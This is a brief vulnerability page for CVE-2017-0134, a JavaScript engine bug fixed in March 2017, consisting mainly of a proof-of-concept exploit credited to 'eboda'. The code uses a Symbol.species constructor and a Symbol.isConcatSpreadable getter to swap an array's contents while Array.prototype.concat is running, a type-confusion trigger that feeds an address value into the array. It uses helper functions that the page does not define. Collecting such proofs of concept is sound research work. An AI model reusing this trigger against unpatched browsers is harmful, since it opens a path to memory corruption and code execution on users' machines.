CVE-2017-0134

  • Fix: Mar 2017
  • Credit: Jordan Rabet, Microsoft Offensive Security Research Team

PoC

PoC from eboda

```javascript
// lower(addr) and upper(addr) are not defined on this page; the PoC is
// reproduced as posted.
var a1 = [];
for (var i = 0; i < 0x100; i++) {
    a1[i] = i;
}
var a2 = [lower(addr), upper(addr)];
var c = new Function();
// Symbol.species makes a1.concat() build its result via this constructor.
// new_array is deliberately left as a global so the getter below can reach it.
c[Symbol.species] = function() {
    new_array = [];
    return new_array;
};
a1.constructor = c;
// The Symbol.isConcatSpreadable getter is invoked while concat() is still
// running and stores an object into the result array at that point.
a2.__defineGetter__(Symbol.isConcatSpreadable, function () {
    new_array[0] = {};
    return true;
});
var res = a1.concat(a2);
res[0x100/2];
```

Reference